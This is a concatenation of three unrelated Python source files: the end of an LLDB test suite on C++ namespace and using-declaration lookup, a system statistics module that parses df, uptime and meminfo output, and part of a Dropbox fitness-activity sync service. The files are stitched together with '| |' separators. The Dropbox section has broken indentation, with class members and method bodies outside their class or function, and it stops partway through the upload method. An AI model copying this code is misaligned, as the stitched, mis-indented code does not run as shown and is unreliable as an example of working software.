        # Evaluate func() - should call ::func()
        self.expect("expr -- func()", startstr="(int) $0 = 1")

    # NOTE: this test may fail on older systems that don't emit import
    # entries in DWARF - may need to add checks for compiler versions here.
    @skipIf(
        compiler="gcc",
        oslist=["linux"],
        debug_info=["dwo"])  # Skip to avoid crash
    @expectedFailureAll(
        oslist=["freebsd"],
        bugnumber="llvm.org/pr25819")
    def test_scope_after_using_directive_lookup_with_run_command(self):
        """Test scope lookup after using directive in lldb."""
        self.build()
        self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns3.cpp",
            self.line_break_after_using_directive,
            num_expected_locations=1,
            loc_exact=False)

        # Run to BP_after_using_directive at global scope after using
        # declaration
        self.runToBkpt("run")
        # Evaluate func2() - should call A::func2()
        self.expect("expr -- func2()", startstr="(int) $0 = 3")

    @expectedFailure(
        "lldb scope lookup after using declaration bugs")
    # NOTE: this test may fail on older systems that don't emit import
    # entries in DWARF - may need to add checks for compiler versions here.
    def test_scope_after_using_declaration_lookup_with_run_command(self):
        """Test scope lookup after using declaration in lldb."""
        self.build()
        self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns2.cpp",
            self.line_break_nested_ns_scope_after_using,
            num_expected_locations=1,
            loc_exact=False)

        # Run to BP_nested_ns_scope_after_using at nested ns scope after using
        # declaration
        self.runToBkpt("run")
        # Evaluate func() - should call A::func()
        self.expect("expr -- func()", startstr="(int) $0 = 3")

    @expectedFailure("lldb scope lookup ambiguity after using bugs")
    def test_scope_ambiguity_after_using_lookup_with_run_command(self):
        """Test scope lookup ambiguity after using in lldb."""
        self.build()
        self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns3.cpp",
            self.line_break_after_using_directive,
            num_expected_locations=1,
            loc_exact=False)

        # Run to BP_after_using_directive at global scope after using
        # declaration
        self.runToBkpt("run")
        # Evaluate func() - should get error: ambiguous
        # FIXME: This test fails because lldb removes duplicates if they have
        # the same type.
        self.expect("expr -- func()", startstr="error")

    @expectedFailureAll(
        oslist=["freebsd"],
        bugnumber="llvm.org/pr25819")
    def test_scope_lookup_shadowed_by_using_with_run_command(self):
        """Test scope lookup shadowed by using in lldb."""
        self.build()
        self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns2.cpp",
            self.line_break_nested_ns_scope,
            num_expected_locations=1,
            loc_exact=False)

        # Run to BP_nested_ns_scope at nested ns scope
        self.runToBkpt("run")
        # Evaluate func(10) - should call A::func(10)
        # NOTE: Under the rules of C++, this test would normally get an error
        # because A::B::func() shadows A::func(), but lldb intentionally
        # disobeys these rules so that the intended overload can be found
        # by only removing duplicates if they have the same type.
        self.expect("expr -- func(10)", startstr="(int) $0 = 13")
| |
"""
Module to query system stats data.
"""
from __future__ import print_function
import subprocess
import string
import time
import os
import platform
__author__ = "Andrew Gillis"
# Seconds that stats are good before needing to be refreshed.
STATS_TTL = 60
class SystemStats(object):
    '''Query and format local system statistics (uptime, CPU load, disk
    usage, memory usage, logical CPU count).

    Results are cached for STATS_TTL seconds; uptime/load caches are
    shared at the class level, disk/memory caches are per-instance.
    '''

    # Class-level (shared) cache for uptime/load data.
    _last_uptime = 0
    _uptime = {}
    _load = {}

    def __init__(self, show_bytes=False, verbose_du=False):
        """
        Arguments:
        show_bytes -- If True, show absolute bytes in size values.  If False,
                      only show sizes rounded to the highest significant power
                      of two.
        verbose_du -- If True, show multi-line per-mount disk usage detail;
                      otherwise show one compact line per mount.
        """
        self._last_disk = 0
        self._disk_stats = None
        self._last_mem = 0
        self._mem_stats = None
        self._show_bytes = show_bytes
        self._verbose_du = verbose_du

    def __str__(self):
        """Get stats information as string."""
        st = [self.uptime_str(),
              self.disk_usage_str(),
              self.cpu_load_str(),
              self.memory_usage_str(),
              self.logical_cpu_count_str()]
        return '\n\n'.join(st)

    def stats(self):
        # All stats as a single dictionary (machine-readable form).
        return {'disk_usage': self.disk_usage(),
                'cpu_load': self.cpu_load(),
                'uptime': self.uptime(),
                'memory_usage': self.memory_usage(),
                'logical_cpu_count': self.logical_cpu_count()}

    def uptime_str(self):
        """Return uptime string."""
        title = 'Uptime:'
        st = [title]
        st.append('-'*len(title))
        up = self.uptime()
        st.append('Up for %s days, %s hours and %s minutes'
                  % (up['days'], up['hours'], up['minutes']))
        return '\n'.join(st)

    def disk_usage_str(self):
        """Return disk usage information as string."""
        title = 'Disk Usage:'
        st = [title]
        st.append('-'*len(title))
        disks = self.disk_usage()
        if self._verbose_du:
            # One multi-line section per mount point.
            for mount in sorted(disks):
                disk_info = disks[mount]
                st.append('Usage for: %s' % mount)
                for datum in ('partition', 'size', 'used', 'available',
                              'capacity'):
                    st.append('    %s: %s' % (datum, disk_info[datum]))
                st.append('')
            if disks:
                # Drop the trailing blank line.
                st.pop()
        else:
            # One compact line per mount point.
            for mount in sorted(disks):
                disk_info = disks[mount]
                st.append('%s\tsize=%s used=%s available=%s capacity=%s' % (
                    mount, disk_info['size'], disk_info['used'],
                    disk_info['available'], disk_info['capacity']))
        return '\n'.join(st)

    def cpu_load_str(self):
        """Return CPU load average information as string."""
        title = 'CPU Load Average:'
        st = [title]
        st.append('-'*len(title))
        load_stats = self.cpu_load()
        st.append('last one minute:      %s' % load_stats['one'])
        st.append('last five minutes:    %s' % load_stats['five'])
        st.append('last fifteen minutes: %s' % load_stats['fifteen'])
        return '\n'.join(st)

    def memory_usage_str(self):
        """Return memory usage information as string."""
        title = 'Memory usage:'
        st = [title]
        st.append('-'*len(title))
        mem_info = self.memory_usage()
        for mem_type in ('total', 'available', 'used', 'free', 'swap_total',
                         'swapped'):
            st.append('%s: %s' % (mem_type, mem_info.get(mem_type, 'n/a')))
        return '\n'.join(st)

    def logical_cpu_count_str(self):
        # Return logical CPU count as a titled string block.
        title = 'Logical CPU Count:'
        st = [title]
        st.append('-'*len(title))
        st.append(str(self.logical_cpu_count()))
        return '\n'.join(st)

    def uptime(self):
        """Return uptime info dictionary."""
        up, load = self._uptime_load()
        return up

    def cpu_load(self):
        """Return CPU load information dictionary."""
        up, load = self._uptime_load()
        return load

    def disk_usage(self):
        """Return disk usage dictionary.

        The top-level disk-usage dictionary has keys consisting of each
        mount point on the file sysem and values consisting of a dictionary of
        information pertaining to that mount point.

        Each mount point dictionary containing the following keys: partition,
        size, used, available, capacity.  Each value is a string describing
        the corresponding data.
        """
        now = int(time.time())
        if now - self._last_disk < STATS_TTL:
            # Cached value is still fresh.
            return self._disk_stats

        # POSIX-format df output: one line per mount after the header.
        proc = subprocess.Popen(('df', '-P'), stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        out, err = proc.communicate()
        df = out.decode('utf-8').strip().split('\n')
        # Header looks like "Filesystem 1024-blocks ...": parse block size.
        block_size = int(df[0].split()[1].split('-')[0])
        ds = {}
        for l in df[1:]:
            part, size_bks, used_bks, avail_bks, cap, mount = l.split()[:6]
            size = int(size_bks) * block_size
            used = int(used_bks) * block_size
            avail = int(avail_bks) * block_size
            info = {'partition': part, 'capacity': cap}
            ds[mount] = info
            if self._show_bytes:
                # Show absolute bytes as well as short size value.
                info['size'] = '%s (%s)' % (size, size_str(size))
                info['used'] = '%s (%s)' % (used, size_str(used))
                info['available'] = '%s (%s)' % (
                    avail, size_str(avail))
            else:
                # Do not show absolute bytes in size values.
                info['size'] = size_str(size)
                info['used'] = size_str(used)
                info['available'] = size_str(avail)

        self._last_disk = now
        self._disk_stats = ds
        return ds

    def memory_usage(self):
        """Return memory usage information dictionary.

        The dictionary returned has the following keys: free, used, total,
        swapped, swap_total, available.  Each value is a string specifying the
        associated value.
        """
        now = int(time.time())
        if now - self._last_mem < STATS_TTL:
            # Cached value is still fresh.
            return self._mem_stats
        if platform.system() == 'Linux':
            mem_stats = self._linux_mem()
        elif platform.system() == 'FreeBSD':
            mem_stats = self._freebsd_mem()
        else:
            # Unsupported platform: return placeholders.
            na = 'n/a'
            mem_stats = {'free': na, 'used': na, 'total': na, 'swapped': na,
                         'swap_total': na, 'available': na}
        self._last_mem = now
        self._mem_stats = mem_stats
        return mem_stats

    def logical_cpu_count(self):
        # Count logical CPUs; falls back to 1 on unsupported platforms.
        cores = 0
        if platform.system() == 'Linux':
            # Count numeric entries under /dev/cpu.
            cpu_path = '/dev/cpu'
            if os.path.exists(cpu_path):
                for dirent in os.listdir(cpu_path):
                    if dirent.isdigit():
                        cores += 1
        elif platform.system() == 'FreeBSD':
            ncpu = subprocess.check_output(
                ['sysctl', '-a', 'hw.ncpu']).decode('utf-8')
            cores = int(ncpu.split(':')[-1].strip())
        else:
            return 1
        return cores

    def _uptime_load(self):
        '''Parse `uptime` output; returns (uptime_dict, load_dict).'''
        # If not enough time has elapsed, then do not update stats.
        now = int(time.time())
        if now - SystemStats._last_uptime < STATS_TTL:
            return SystemStats._uptime, SystemStats._load
        SystemStats._last_uptime = now
        # Characters to strip so that only digits (and ':') remain.
        not_nums = string.whitespace+string.ascii_letters+string.punctuation
        uptime = subprocess.check_output('uptime').decode('utf-8')
        ut = uptime.split(',')
        days = ut[0]
        if days.find('day') == -1:
            # Up for less than a day: first field is "... up HH:MM".
            idx = days.find('up')
            duration = days[idx + 3:]
            days = 0
        else:
            # First field is "... up N days"; duration is the next field.
            days_idx = days.find('up')
            days = days[days_idx + 3:].strip(not_nums)
            duration = ut[1]
        duration = duration.strip(not_nums)
        if ':' in duration:
            hours, minutes = duration.split(':')
        else:
            # Duration like "59 min": only minutes present.
            hours = 0
            minutes = duration
        u = {'days': int(days), 'hours': int(hours), 'minutes': int(minutes)}
        # The last three whitespace-separated fields are the load averages.
        one, five, fifteen = uptime.strip(',').rsplit(None, 3)[-3:]
        l = {'one': float(one.rstrip(',')),
             'five': float(five.rstrip(',')),
             'fifteen': float(fifteen.rstrip(','))}
        SystemStats._uptime = u
        SystemStats._load = l
        return u, l

    def _linux_mem(self):
        """Get the available memory for a linux system.

        This is done by reading /proc/meminfo
        """
        meminfo = {}

        def convert_mem(label):
            # Convert a "<number> <unit>" meminfo value to bytes.
            mem, units = meminfo[label].split()
            if units == 'kB':
                mem = int(mem) * 1024
            elif units == 'mB':
                mem = int(mem) * 1024 * 1024
            else:
                mem = int(mem)
            return mem

        mem_free = mem_used = mem_total = mem_avail = 'n/a'
        swapped = swap_total = 'n/a'
        if os.path.exists('/proc/meminfo'):
            try:
                with open('/proc/meminfo') as file_meminfo:
                    meminfo_data = file_meminfo.read()
                for l in meminfo_data.split("\n"):
                    if ':' not in l:
                        continue
                    k, v = l.split(':', 1)
                    meminfo[k] = v.strip()
                mem_total = convert_mem('MemTotal')
                mem_free = convert_mem('MemFree')
                mem_buffers = convert_mem('Buffers')
                mem_cached = convert_mem('Cached')
                #mem_inactive = convert_mem('Inactive')
                swapped = convert_mem('SwapCached')
                swap_total = convert_mem('SwapTotal')
                # determine logical summary information
                #mem_avail = mem_inactive + mem_cached + mem_free
                mem_avail = mem_buffers + mem_cached + mem_free
                mem_used = mem_total - mem_avail
                if self._show_bytes:
                    mem_free = '%d (%s)' % (mem_free,
                                            size_str(mem_free))
                    mem_total = '%d (%s)' % (mem_total,
                                             size_str(mem_total))
                    mem_avail = '%d (%s)' % (mem_avail,
                                             size_str(mem_avail))
                    mem_used = '%d (%s)' % (mem_used,
                                            size_str(mem_used))
                    swapped = '%d (%s)' % (swapped,
                                           size_str(swapped))
                    swap_total = '%d (%s)' % (swap_total,
                                              size_str(swap_total))
                else:
                    mem_free = size_str(mem_free)
                    mem_total = size_str(mem_total)
                    mem_avail = size_str(mem_avail)
                    mem_used = size_str(mem_used)
                    swapped = size_str(swapped)
                    swap_total = size_str(swap_total)
            except Exception:
                # Best-effort: fall through with 'n/a' placeholders.
                pass

        return {'free': mem_free, 'used': mem_used, 'total': mem_total,
                'swapped': swapped, 'swap_total': swap_total,
                'available': mem_avail}

    def _freebsd_mem(self):
        """Get the available memory for a FreeBSD system.

        This is done by reading information from sysctl.
        """
        mem_free = mem_used = mem_total = mem_avail = 'n/a'
        swapped = swap_total = 'n/a'
        try:
            sysctl = {}
            out = subprocess.check_output(
                ('/sbin/sysctl', '-a')).decode('utf-8').strip()
            for l in out.split('\n'):
                if ':' not in l:
                    continue
                k, v = l.split(':', 1)
                sysctl[k] = v

            def mem_rounded(mem_size):
                # Round physical memory up to the presumed hardware chip
                # size (next power-of-two granule).
                chip_size = 1
                chip_guess = (mem_size // 8) - 1
                while (chip_guess):
                    chip_guess >>= 1
                    chip_size <<= 1
                return ((mem_size // chip_size) + 1) * chip_size

            mem_phys = int(sysctl['hw.physmem'])
            page_size = int(sysctl['hw.pagesize'])
            mem_hw = mem_rounded(mem_phys)
            #mem_all = (int(sysctl['vm.stats.vm.v_page_count']) * page_size)
            #mem_wire = (int(sysctl['vm.stats.vm.v_wire_count']) * page_size)
            #mem_active= (int(sysctl['vm.stats.vm.v_active_count'])* page_size)
            mem_inactive = (int(sysctl['vm.stats.vm.v_inactive_count']) *
                            page_size)
            mem_cache = (int(sysctl['vm.stats.vm.v_cache_count']) * page_size)
            mem_free = (int(sysctl['vm.stats.vm.v_free_count']) * page_size)
            swap_total = int(sysctl['vm.swap_total'])
            swapped = int(sysctl['vm.stats.vm.v_swappgsout'])
            # determine logical summary information
            mem_total = mem_hw
            mem_avail = mem_inactive + mem_cache + mem_free
            mem_used = mem_total - mem_avail
            if self._show_bytes:
                mem_free = '%d (%s)' % (mem_free,
                                        size_str(mem_free))
                mem_total = '%d (%s)' % (mem_total,
                                         size_str(mem_total))
                mem_avail = '%d (%s)' % (mem_avail,
                                         size_str(mem_avail))
                mem_used = '%d (%s)' % (mem_used,
                                        size_str(mem_used))
                swapped = '%d (%s)' % (swapped, size_str(swapped))
                swap_total = '%d (%s)' % (swap_total,
                                          size_str(swap_total))
            else:
                mem_free = size_str(mem_free)
                mem_total = size_str(mem_total)
                mem_avail = size_str(mem_avail)
                mem_used = size_str(mem_used)
                swapped = size_str(swapped)
                swap_total = size_str(swap_total)
        except Exception:
            # Best-effort: fall through with 'n/a' placeholders.
            pass

        return {'free': mem_free, 'used': mem_used, 'total': mem_total,
                'swapped': swapped, 'swap_total': swap_total,
                'available': mem_avail}
def size_str(byte_size):
    """Truncate number to highest significant power of 2 and add suffix.

    Values strictly greater than a unit boundary are expressed in that
    unit rounded to one decimal place; smaller values are returned as a
    plain decimal string.
    """
    scales = (
        (1024 ** 3, 'G'),
        (1024 ** 2, 'M'),
        (1024, 'K'),
    )
    for threshold, suffix in scales:
        if byte_size > threshold:
            return str(round(float(byte_size) / threshold, 1)) + suffix
    return str(byte_size)
if __name__ == '__main__':
    import argparse
    ap = argparse.ArgumentParser(description='Show system information')
    ap.add_argument('--verbose', '-v', action='store_true',
                    help='Show verbose output.')
    args = ap.parse_args()
    # This module can be run alone to output stats info for the local system.
    if args.verbose:
        # Verbose: absolute byte counts plus per-mount disk detail.
        print(SystemStats(True, True))
    else:
        print(SystemStats(False, False))
| |
from datetime import datetime, timedelta
from django.core.urlresolvers import reverse
from tapiriik.database import cachedb
from tapiriik.services.api import APIException, ServiceExceptionScope, UserException, UserExceptionType, APIExcludeActivity, ServiceException
from tapiriik.services.exception_tools import strip_context
from tapiriik.services.gpx import GPXIO
from tapiriik.services.interchange import ActivityType, UploadedActivity
from tapiriik.services.service_base import ServiceAuthenticationType, ServiceBase
from tapiriik.services.tcx import TCXIO
from tapiriik.settings import WEB_ROOT, DROPBOX_APP_KEY, DROPBOX_APP_SECRET, DROPBOX_FULL_APP_KEY, DROPBOX_FULL_APP_SECRET
import bson
import dropbox
import json
import logging
import lxml
import pickle
import re
import requests
logger = logging.getLogger(__name__)
class DropboxService(ServiceBase):
ID = "dropbox"
DisplayName = "Dropbox"
DisplayAbbreviation = "DB"
AuthenticationType = ServiceAuthenticationType.OAuth
AuthenticationNoFrame = True # damn dropbox, spoiling my slick UI
Configurable = True
ReceivesStationaryActivities = False
ActivityTaggingTable = { # earlier items have precedence over
ActivityType.Running: "run(?!tastic)",
ActivityType.MountainBiking: "m(oun)?t(ai)?n\s*bik(e|ing)",
ActivityType.Cycling: "(cycl(e|ing)|bik(e|ing))",
ActivityType.Walking: "walk",
ActivityType.Hiking: "hik(e|ing)",
ActivityType.DownhillSkiing: "(downhill|down(hill)?\s*ski(ing)?)",
ActivityType.CrossCountrySkiing: "(xc|cross.*country)\s*ski(ing)?",
ActivityType.Snowboarding: "snowboard(ing)?",
ActivityType.Skating: "skat(e|ing)?",
ActivityType.Swimming: "swim",
ActivityType.Wheelchair: "wheelchair",
ActivityType.Rowing: "row",
ActivityType.Elliptical: "elliptical",
ActivityType.RollerSkiing: "rollerskiing",
ActivityType.StrengthTraining: "strength( ?training)?",
ActivityType.Gym: "(gym|workout)",
ActivityType.Climbing: "climb(ing)?",
ActivityType.StandUpPaddling: "(sup|stand( |-)/up ?paddl(e|ing))",
ActivityType.Other: "(other|unknown)"
}
ConfigurationDefaults = {"SyncRoot": "/", "UploadUntagged": False, "Format":"tcx", "Filename":"%Y-%m-%d_%H-%M-%S_#NAME_#TYPE"}
SupportsHR = SupportsCadence = True
SupportedActivities = ActivityTaggingTable.keys()
def _app_credentials(self, full):
    """Return the (key, secret) pair for the full-access or the
    folder-scoped Dropbox app, depending on *full*."""
    credentials = ((DROPBOX_FULL_APP_KEY, DROPBOX_FULL_APP_SECRET)
                   if full
                   else (DROPBOX_APP_KEY, DROPBOX_APP_SECRET))
    return credentials
def _getClient(self, serviceRec):
    '''
    Return a dropbox.Dropbox client for *serviceRec*, transparently
    upgrading a legacy OAuth v1 token ("Key"/"Secret") to a v2 token
    and persisting the upgraded record.
    '''
    from tapiriik.services import Service
    if "Secret" in serviceRec.Authorization:
        # Upgrade OAuth v1 token to v2.
        # The new Python SDK has a method for this
        # ...that requires initializing a client with a v2 user auth token :|
        upgrade_data = {
            "oauth1_token": serviceRec.Authorization["Key"],
            "oauth1_token_secret": serviceRec.Authorization["Secret"]
        }
        res = requests.post("https://api.dropboxapi.com/2/auth/token/from_oauth1",
                            json=upgrade_data,
                            auth=self._app_credentials(serviceRec.Authorization["Full"]))
        token = res.json()["oauth2_token"]
        # Update service record.
        Service.EnsureServiceRecordWithAuth(self, serviceRec.ExternalID, {
            "Token": token,
            "Full": serviceRec.Authorization["Full"]
        })
    else:
        # Already an OAuth2 record.
        token = serviceRec.Authorization["Token"]
    return dropbox.Dropbox(token)
def WebInit(self):
    # URL the web frontend sends users to in order to start authorization.
    self.UserAuthorizationURL = reverse("oauth_redirect", kwargs={"service": "dropbox"})
def RequiresConfiguration(self, svcRec):
    """Full-access connections need a non-empty SyncRoot configured."""
    if not svcRec.Authorization["Full"]:
        # Folder-scoped apps need no extra configuration.
        return False
    if "SyncRoot" not in svcRec.Config:
        return True
    return not len(svcRec.Config["SyncRoot"])
def _oauth2_flow(self, full, session):
    '''Build a DropboxOAuth2Flow for the full or normal app, with the
    return URL encoding which access level was requested.'''
    app_credentials = self._app_credentials(full)
    redirect_uri = WEB_ROOT + reverse("oauth_return",
                                      kwargs={"service": "dropbox", "level": "full" if full else "normal"})
    return dropbox.DropboxOAuth2Flow(
        app_credentials[0], app_credentials[1], redirect_uri, session,
        "dropbox-auth-csrf-token")
def GenerateUserAuthorizationURL(self, session, level=None):
    # level == "full" selects the full-Dropbox app; anything else the
    # folder-scoped app.
    return self._oauth2_flow(level == "full", session).start()
def RetrieveAuthorizationToken(self, req, level):
    """Finish the OAuth2 flow for *req* and return
    (external_id, authorization_record)."""
    is_full = level == "full"
    flow = self._oauth2_flow(is_full, req.session)
    oauth_result = flow.finish(req.GET)
    external_id = int(oauth_result.user_id)
    return (external_id, {"Token": oauth_result.access_token, "Full": is_full})
def RevokeAuthorization(self, serviceRecord):
    # Token revocation is intentionally not implemented for Dropbox.
    pass  # :(
def ConfigurationUpdating(self, svcRec, newConfig, oldConfig):
    from tapiriik.sync import Sync
    from tapiriik.auth import User
    if newConfig["SyncRoot"] != oldConfig["SyncRoot"]:
        # A changed sync root invalidates the cached folder structure:
        # schedule an immediate full resync and drop the cache entry.
        Sync.ScheduleImmediateSync(User.AuthByService(svcRec), True)
        cachedb.dropbox_cache.update({"ExternalID": svcRec.ExternalID}, {"$unset": {"Structure": None}})
def _raiseDbException(self, e):
    '''Translate a Dropbox SDK exception *e* into an APIException.

    Always raises; auth failures and quota exhaustion are mapped to
    blocking, user-visible exceptions.
    '''
    if isinstance(e, dropbox.exceptions.AuthError):
        raise APIException("Authorization error - %s" % e, block=True, user_exception=UserException(UserExceptionType.Authorization, intervention_required=True))
    if isinstance(e, dropbox.exceptions.ApiError) and \
       e.error.is_path() and \
       e.error.get_path().reason.is_insufficient_space():
        raise APIException("Dropbox quota error", block=True, user_exception=UserException(UserExceptionType.AccountFull, intervention_required=True))
    # Anything else is a generic, non-blocking API failure.
    raise APIException("API failure - %s" % e)
def _tagActivity(self, text):
    """Return the first ActivityType whose regex in ActivityTaggingTable
    matches *text* (case-insensitively), or None if nothing matches."""
    matches = (activity_type
               for activity_type, pattern in self.ActivityTaggingTable.items()
               if re.search(pattern, text, re.IGNORECASE))
    return next(matches, None)
def _getActivity(self, serviceRecord, dbcl, path, base_activity=None):
    '''
    Download and parse one activity file from Dropbox.

    Returns (activity, dropbox_rev).  Raises APIExcludeActivity for
    files that cannot be parsed; Dropbox errors are translated via
    _raiseDbException.
    '''
    try:
        metadata, file = dbcl.files_download(path)
    except dropbox.exceptions.DropboxException as e:
        self._raiseDbException(e)
    try:
        # Format is selected by extension; anything not .tcx is
        # treated as GPX.
        if path.lower().endswith(".tcx"):
            act = TCXIO.Parse(file.content, base_activity)
        else:
            act = GPXIO.Parse(file.content, base_activity)
    except ValueError as e:
        raise APIExcludeActivity("Invalid GPX/TCX " + str(e), activity_id=path, user_exception=UserException(UserExceptionType.Corrupt))
    except lxml.etree.XMLSyntaxError as e:
        raise APIExcludeActivity("LXML parse error " + str(e), activity_id=path, user_exception=UserException(UserExceptionType.Corrupt))
    return act, metadata.rev
def DownloadActivityList(self, svcRec, exhaustive=False):
    """Enumerate GPX/TCX files under the user's sync root as activities.

    Uses a per-user Mongo metadata cache keyed on a hash of each file's
    relative path: files whose Dropbox rev is unchanged are rehydrated
    cheaply from the cache (UID and start/end times only); new or
    changed files are downloaded and fully parsed. Cache entries for
    files that no longer exist are pruned at the end.

    Returns:
        (activities, exclusions) - exclusions lists files skipped as
        unparseable.
    """
    dbcl = self._getClient(svcRec)
    if not svcRec.Authorization["Full"]:
        # Sandboxed (app-folder) access: the app folder itself is the root.
        syncRoot = "/"
    else:
        syncRoot = svcRec.Config["SyncRoot"]
    # Dropbox API v2 doesn't like / as root.
    if syncRoot == "/":
        syncRoot = ""
    # New Dropbox API prefers path_lower, it would seem.
    syncRoot = syncRoot.lower()
    # There used to be a massive affair going on here to cache the folder structure locally.
    # Dropbox API 2.0 doesn't support the hashes I need for that.
    # Oh well. Throw that data out now. Well, don't load it at all.
    cache = cachedb.dropbox_cache.find_one({"ExternalID": svcRec.ExternalID}, {"ExternalID": True, "Activities": True})
    if cache is None:
        cache = {"ExternalID": svcRec.ExternalID, "Activities": {}}
    try:
        list_result = dbcl.files_list_folder(syncRoot, recursive=True)
    except dropbox.exceptions.DropboxException as e:
        self._raiseDbException(e)
    def cache_writeback():
        # Upsert by hand: save() once we hold a Mongo _id, otherwise
        # insert() and remember the new _id for subsequent saves.
        if "_id" in cache:
            cachedb.dropbox_cache.save(cache)
        else:
            insert_result = cachedb.dropbox_cache.insert(cache)
            cache["_id"] = insert_result.inserted_id
    activities = []
    exclusions = []
    discovered_activity_cache_keys = set()
    while True:
        for entry in list_result.entries:
            if not hasattr(entry, "rev"):
                # Not a file -> we don't care.
                continue
            path = entry.path_lower
            if not path.endswith(".gpx") and not path.endswith(".tcx"):
                # Not an activity file -> we don't care.
                continue
            if svcRec.Authorization["Full"]:
                relPath = path.replace(syncRoot, "", 1)
            else:
                relPath = path.replace("/Apps/tapiriik/", "", 1) # dropbox api is meh api
            hashedRelPath = self._hash_path(relPath)
            discovered_activity_cache_keys.add(hashedRelPath)
            if hashedRelPath in cache["Activities"]:
                existing = cache["Activities"][hashedRelPath]
            else:
                existing = None
            if existing and existing["Rev"] == entry.rev:
                # Cache hit: don't need entire activity loaded here, just UID
                act = UploadedActivity()
                act.UID = existing["UID"]
                try:
                    act.StartTime = datetime.strptime(existing["StartTime"], "%H:%M:%S %d %m %Y %z")
                except:
                    act.StartTime = datetime.strptime(existing["StartTime"], "%H:%M:%S %d %m %Y") # Exactly one user has managed to break %z :S
                if "EndTime" in existing: # some cached activities may not have this, it is not essential
                    act.EndTime = datetime.strptime(existing["EndTime"], "%H:%M:%S %d %m %Y %z")
            else:
                logger.debug("Retrieving %s (%s)" % (path, "outdated meta cache" if existing else "not in meta cache"))
                # get the full activity
                try:
                    act, rev = self._getActivity(svcRec, dbcl, path)
                except APIExcludeActivity as e:
                    logger.info("Encountered APIExcludeActivity %s" % str(e))
                    exclusions.append(strip_context(e))
                    continue
                try:
                    act.EnsureTZ()
                except:
                    pass # We tried.
                act.Laps = [] # Yeah, I'll process the activity twice, but at this point CPU time is more plentiful than RAM.
                cache["Activities"][hashedRelPath] = {"Rev": rev, "UID": act.UID, "StartTime": act.StartTime.strftime("%H:%M:%S %d %m %Y %z"), "EndTime": act.EndTime.strftime("%H:%M:%S %d %m %Y %z")}
                # Incrementally update the cache db.
                # Otherwise, if we crash later on in listing
                # (due to OOM or similar), we'll never make progress on this account.
                cache_writeback()
            tagRes = self._tagActivity(relPath)
            act.ServiceData = {"Path": path, "Tagged": tagRes is not None}
            act.Type = tagRes if tagRes is not None else ActivityType.Other
            logger.debug("Activity s/t %s" % act.StartTime)
            activities.append(act)
        # Perform pagination.
        if list_result.has_more:
            list_result = dbcl.files_list_folder_continue(list_result.cursor)
        else:
            break
    # Drop deleted activities' records from cache.
    all_activity_cache_keys = set(cache["Activities"].keys())
    for deleted_key in all_activity_cache_keys - discovered_activity_cache_keys:
        del cache["Activities"][deleted_key]
    cache_writeback()
    return activities, exclusions
def DownloadActivity(self, serviceRecord, activity):
    """Fetch and fully parse the file backing *activity*.

    Untagged files are skipped unless the user opted into uploading
    untagged activities; activities with at most one waypoint are
    rejected since Dropbox can't represent stationary activities yet.
    """
    file_path = activity.ServiceData["Path"]
    # activity might not be populated at this point, still possible to bail out
    if not activity.ServiceData["Tagged"]:
        allow_untagged = (hasattr(serviceRecord, "Config")
                          and "UploadUntagged" in serviceRecord.Config
                          and serviceRecord.Config["UploadUntagged"])
        if not allow_untagged:
            raise APIExcludeActivity("Activity untagged", permanent=False, activity_id=file_path, user_exception=UserException(UserExceptionType.Untagged))
    client = self._getClient(serviceRecord)
    activity, _rev = self._getActivity(serviceRecord, client, file_path, base_activity=activity)
    # Dropbox doesn't support stationary activities yet.
    if activity.CountTotalWaypoints() <= 1:
        raise APIExcludeActivity("Too few waypoints", activity_id=file_path, user_exception=UserException(UserExceptionType.Corrupt))
    return activity
def _hash_path(self, path):
import hashlib
# Can't use the raw file path as a dict key in Mongo, since who knows what'll be in it (periods especially)
# Used the activity UID for the longest time, but that causes inefficiency when >1 file represents the same activity
# So, this:
csp = hashlib.new("md5")
csp.update(path.encode('utf-8'))
return csp.hexdigest()
def _clean_activity_name(self, name):
# https://www.dropbox.com/help/145/en
# Nothing outside BMP is allowed, either, apparently.
return re.sub("[@><:\"|?*]|[^\U00000000-\U0000d7ff\U0000e000-\U0000ffff]", "", re.sub("[/\\\]", "-", name))
def _format_file_name(self, format, activity):
name_pattern = re.compile("#NAME", re.IGNORECASE)
type_pattern = re.compile("#TYPE", re.IGNORECASE)
name = activity.StartTime.strftime(format)
name = name_pattern.sub(self._clean_activity_name(activity.Name) if activity.Name and len(activity.Name) > 0 and activity.Name.lower() != activity.Type.lower() else "", name)
name = type_pattern.sub(activity.Type, name)
name = re.sub(r"([\W_])\1+", r"\1", name) # To handle cases where the activity is unnamed
name = re.sub(r"^([\W_])|([\W_])$", "", name) # To deal with trailing-seperator weirdness (repeated seperator handled by prev regexp)
return name
def UploadActivity(self, serviceRecord, activity):
    """Render *activity* in the user's configured format and upload it.

    The format (tcx/gpx) and filename pattern come from the
    connection's configuration. The file is written beneath the sync
    root (or the app folder for sandboxed access) with overwrite
    semantics, and the metadata cache is primed so the file isn't
    immediately re-downloaded on the next list.

    Returns:
        The Dropbox path the file was written to.
    """
    format = serviceRecord.GetConfiguration()["Format"]
    # Prefer a prerendered payload when one was produced earlier in the
    # sync pipeline; otherwise serialize the activity now.
    if format == "tcx":
        if "tcx" in activity.PrerenderedFormats:
            logger.debug("Using prerendered TCX")
            data = activity.PrerenderedFormats["tcx"]
        else:
            data = TCXIO.Dump(activity)
    else:
        if "gpx" in activity.PrerenderedFormats:
            logger.debug("Using prerendered GPX")
            data = activity.PrerenderedFormats["gpx"]
        else:
            data = GPXIO.Dump(activity)
    dbcl = self._getClient(serviceRecord)
    fname = self._format_file_name(serviceRecord.GetConfiguration()["Filename"], activity)[:250] + "." + format # DB has a max path component length of 255 chars, and we have to save for the file ext (4) and the leading slash (1)
    if not serviceRecord.Authorization["Full"]:
        fpath = "/" + fname
    else:
        fpath = serviceRecord.Config["SyncRoot"] + "/" + fname
    try:
        metadata = dbcl.files_upload(data.encode("UTF-8"), fpath, mode=dropbox.files.WriteMode.overwrite)
    except dropbox.exceptions.DropboxException as e:
        self._raiseDbException(e)
    # Fake this in so we don't immediately redownload the activity next time 'round
